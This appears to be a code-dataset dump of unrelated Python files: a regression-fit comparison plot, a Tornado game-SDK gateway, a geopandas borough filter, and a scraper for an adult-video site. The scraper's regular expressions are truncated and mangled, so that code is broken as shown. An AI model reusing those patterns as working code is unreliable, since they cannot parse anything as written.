sigma_x_abs**2)\n dy = np.sqrt((y * sigma_y_rel)**2 + sigma_y_abs**2)\n\n # calculate total relative uncertainty [%]\n u_x = np.mean(dx / x) * 100\n u_y = np.mean(dy / y) * 100\n\n parameters = dict()\n\n label = 'Truth: y={:1.2f}x{:+1.2f}'.format(slope_true, intercept_true)\n parameters = {label: (intercept_true, slope_true, np.nan, np.nan)}\n\n # bivariate, York et al 2004\n slope, intercept, S, cov = bivariate_fit(\n x, y, dx, dy, b0=0.0)\n label = 'York, 2004 :y={:1.2f}x{:+1.2f}'.format(slope*365, intercept)\n parameters.update({label: (intercept, slope, S, cov)})\n\n # OLS\n slope, intercept = np.polyfit(x, y, 1)\n S = np.nan\n cov = np.nan\n label = 'OLS: y={:1.2f}x{:+1.2f}'.format(slope*365, intercept)\n parameters.update({label: (intercept, slope, S, cov)})\n\n # Bayes OLS.\n slope, intercept = bayes_ols_fit(x, y)\n S = np.nan\n cov = np.nan\n label = 'Bayes OLS: y={:1.2f}x+{:1.2f}'.format(slope*365, intercept)\n parameters.update({label: (intercept, slope, S, cov)})\n\n # Deming\n slope, intercept = deming_fit(x, y)\n S = np.nan\n cov = np.nan\n label = 'Deming: y={:1.2f}x{:+1.2f}'.format(slope*365, intercept)\n parameters.update({label: (intercept, slope, S, cov)})\n\n # ODR, weighted orthogonal distance regression\n slope, intercept = odr_fit(x, y, dx, dy)\n S = np.nan\n cov = np.nan\n label = 'ODR: y={:1.2f}x{:+1.2f}'.format(slope*365, intercept)\n parameters.update({label: (intercept, slope, S, cov)})\n\n # quantile\n slope, intercept, cov = quantile_fit(x, y)\n S = np.nan\n label = 'Quantile: y={:1.2f}x+{:1.2f}'.format(slope*365, intercept)\n parameters.update({label: (intercept, slope, S, cov)})\n\n # pca\n slope, intercept = pca_fit(x, y)\n S = np.nan\n cov = np.nan\n label = 'PCA: y={:1.2f}x{:+1.2f}'.format(slope*365, intercept)\n parameters.update({label: (intercept, slope, S, cov)})\n\n fig = plt.figure(figsize=(9, 9))\n ax = fig.add_subplot(111)\n\n # plot error bar\n ax.errorbar(\n x, y,\n xerr=dx, yerr=dy,\n fmt='o',\n errorevery=100,\n linestyle='None',\n marker='.',\n ecolor='k',\n elinewidth=0.5,\n barsabove=True,\n label=None)\n\n xlim = np.array(ax.get_xlim())\n ylim = np.array(ax.get_ylim())\n\n for label, (intercept, slope, S, cov) in parameters.items():\n ax.plot(xlim, slope*xlim + intercept, '-', label=label)\n\n plt.suptitle('ITO Homework Fig. 
1, synthetic data\\nThe correct relationship is y={:1.2f}x{:+1.2f}'.format(slope_true, intercept_true), fontsize=16)\n\n    ax.set_xlabel('x, total uncertainty {:1.0f}%'.format(u_x))\n    ax.set_ylabel('y, total uncertainty {:1.0f}%'.format(u_y))\n\n    ax.set_xlim(xlim)\n    ax.set_ylim(ylim)\n    ax.grid(b=True)\n    ax.legend(loc='lower right')\n    plt.show()","sub_path":"code/regression_estimators_CVAO.py","file_name":"regression_estimators_CVAO.py","file_ext":"py","file_size_in_byte":18277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"234457918","text":"\"\"\"\nThe backend serves all data through one unified interface.\n\"\"\"\nimport tornado.web\nimport tornado.httpserver\nimport tornado.ioloop\nfrom tornado.options import options\n\nimport settings\nimport platform_defines\nfrom utils.handler_mixn import HandlerMixin\nfrom utils.async_mysql import AsyncMysql\nfrom utils.sign_mixin import SignMixin\nfrom game_server import ZQWebGateway\n\n\nclass Web(tornado.web.RequestHandler, HandlerMixin):\n    \"\"\"Generic web handler class\"\"\"\n\n    def initialize(self, mysql, game_server):\n        self._mysql = mysql  # reference to the database object\n        self.game_server = game_server\n\n    @tornado.web.asynchronous\n    def get(self, app_id, handler_name, action):\n        \"\"\"Handle GET requests\"\"\"\n        print('**request log: url:{}, body:{}**'.format(self.request.uri, self.request.body))\n        self.handle_request_with_process(app_id, handler_name, action)\n\n    @tornado.web.asynchronous\n    def post(self, app_id, handler_name, action):\n        \"\"\"Handle POST requests\"\"\"\n        print('**request log: url:{}, body:{}**'.format(self.request.uri, self.request.body))\n        self.handle_request_with_process(app_id, handler_name, action)\n\n\nclass Voice(Web, SignMixin):\n    \"\"\"Speech recognition\"\"\"\n\n    def on_voice_callback(self, packet, msg):\n        \"\"\"Callback returning the recognition result\"\"\"\n        data = {'status':200, 'data': packet} if msg else {'status':403, 'data':packet}\n        self.write(data)\n        self.finish()\n\n\nclass CreateOrder(Web, SignMixin):\n    \"\"\"Order creation\"\"\"\n\n    def on_create_order_callback(self, succeed, msg):\n        \"\"\"Order callback\"\"\"\n        data ={'status':200, 'data':succeed} if succeed else {'status':403, 'data':msg}\n        self.write(data)\n        self.finish()\n\n\nclass LevelUpdate(Web, SignMixin):\n    \"\"\"Level-update endpoint\"\"\"\n    def on_level_update_callback(self):\n        pass\n\n    def check_sign(self, packet):\n        \"\"\"MD5-verify the login parameters\"\"\"\n        # assumption: SignMixin implements the actual signing routine; calling\n        # it explicitly keeps this override from recursing into itself\n        return packet['sign'] == SignMixin.check_sign(self, packet)\n\n\ndef start():\n    # import the big data-definition dictionaries\n    platform_defines.import_defines()\n    try:\n        tornado.options.parse_command_line()\n        # initialize the database\n        mysql = AsyncMysql(db_config=settings.db_condig['development'])\n        # initialize the game server\n        game_server_params = settings.game_server_config[options.mode]\n        game_server = ZQWebGateway(game_server_params['host'], game_server_params['port'], mysql=mysql)\n        app = tornado.web.Application([\n            # special-purpose endpoints (matched first; tornado dispatches in order)\n            (r'/(?P<app_id>[^/]+)/(?P<handler_name>[^/]+)/(?P<action>voice_translate)', Voice, dict(mysql=mysql, game_server=game_server)),  # Baidu speech recognition\n            (r'/(?P<app_id>[^/]+)/(?P<handler_name>[^/]+)/(?P<action>level_update)', LevelUpdate, dict(mysql=mysql, game_server=game_server)),  # level update\n            # generic catch-all endpoint (order creation)\n            (r'/(?P<app_id>[^/]+)/(?P<handler_name>[^/]+)/(?P<action>[^/]+)', CreateOrder, dict(mysql=mysql, game_server=game_server)),\n        ])\n        http_server = tornado.httpserver.HTTPServer(app)\n        http_server.listen(options.port, options.address)\n        tornado.ioloop.IOLoop.current().start()\n    except KeyboardInterrupt:\n        tornado.ioloop.IOLoop.instance().stop()\n    except Exception as e:\n        \"\"\"Not handled here for now; re-raise directly\"\"\"\n        print(e)\n        raise\n\n
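# Editorial note (sketch, not in the original): the three named URL groups are\n# passed to the handlers as keyword arguments matching get/post(self, app_id,\n# handler_name, action), so the test URL at the bottom of this file,\n#   127.0.0.1:8080/0/pay_notice/test?my_order_id=152&theirs_order_id=520&price=1000\n# dispatches with app_id='0', handler_name='pay_notice', action='test'.\n\n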
def main():\n    \"\"\"Entry point\"\"\"\n    # define the global options\n    options.define(name='port', default=settings.PORT, help='run on the given port', type=int)  # server port\n    options.define(name='address', default=settings.HOST, help='run on the given address', type=str)  # server address\n    options.define(name='mode', default='development', help='default run in development mode')  # run mode\n    start()\n\n\nif __name__ == \"__main__\":\n    main()\n    # The threaded database layer is already written; some of the later\n    # parameters could be stored in the database.\n    # test url: 127.0.0.1:8080/0/level_update/level_update?name=dwh&age=18\n    # test url: 127.0.0.1:8080/0/pay_notice/test?my_order_id=152&theirs_order_id=520&price=1000\n","sub_path":"tornado_SDK/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"186098782","text":"import pandas as pd\nimport geopandas\nfrom shapely.geometry import Point\nimport matplotlib.pyplot as plt\nimport shapely.speedups\n\n\nlondon_boroughs = geopandas.GeoDataFrame.from_file('/Users/michaelpatterson/PycharmProjects/group_project/London_Borough_Excluding_MHW.shp')\ncrimes = pd.read_csv('/Users/michaelpatterson/PycharmProjects/group_project/polygon_demo.csv')\nlondon_boroughs=london_boroughs.to_crs(epsg=4326)\ndemo_borough = london_boroughs[london_boroughs['NAME'].str.contains('Kensington', regex=False)]\nprint(demo_borough)\n\n\n#Creates a geopandas dataframe from february predictions\ngeometry = [Point(xy) for xy in zip(crimes.center_x, crimes.center_y)]\ndf = crimes.drop(['center_x', 'center_y'], axis=1)\ncrs = {'init': 'epsg:4326'}\ncrimes_geo = geopandas.GeoDataFrame(df, geometry=geometry, crs=crs)\n\ninside_borough = []\noutside_borough = []\n\n
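# Editorial sketch (not in the original; assumes an rtree-backed geopandas):\n# the nested loops below can usually be replaced by a single spatial join,\n#   joined = geopandas.sjoin(crimes_geo, demo_borough, how='inner', op='within')\n# (newer geopandas versions spell the last argument predicate='within').\n\n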
    [^\"]*)\">')\n initialComp = re.compile('[^\"]*)\" title=\"Watch Online')\n pageComp = re.compile('
\n\n    siteTemplate = 'http://javon.tv/{}'\n    seriesTemplate = siteTemplate\n    tags = ['ja', 'javon']\n\n    @property\n    @memorize\n    def intUrlObj(self):\n        intUrl = self.webpageIt(self.initialComp.search(self.source).group('link'))\n        return intUrl\n\n    @property\n    @memorize\n    def pages(self):\n        pages = list()\n        pageParse = self.compOne.search(self.intUrlObj.source).group('pageSet')\n        for r in self.compTwo.findall(pageParse):\n            pages.append(self.page(self.siteTemplate.format(r)))\n        return pages\n\n    @property\n    @memorize\n    def title(self):\n        #return self.name.split('/')[-1].replace('.html', '')\n        titleReturn = self.pages[0].title\n        if titleReturn == '':\n            return self.name.split('/')[-1].replace('.html', '')\n        return titleReturn\n\n    class page(vidSeries.page):\n        fileComp = re.compile('flashvars.file=\"(?P<file>[^\"]*)\"')\n        flvComp = re.compile('url=(?P<url>[^&]*)&')\n        keyVarComp = re.compile('flashvars.filekey=(?P<key>[^;]*);')\n        keyComp = NotImplemented\n        linkComp = re.compile('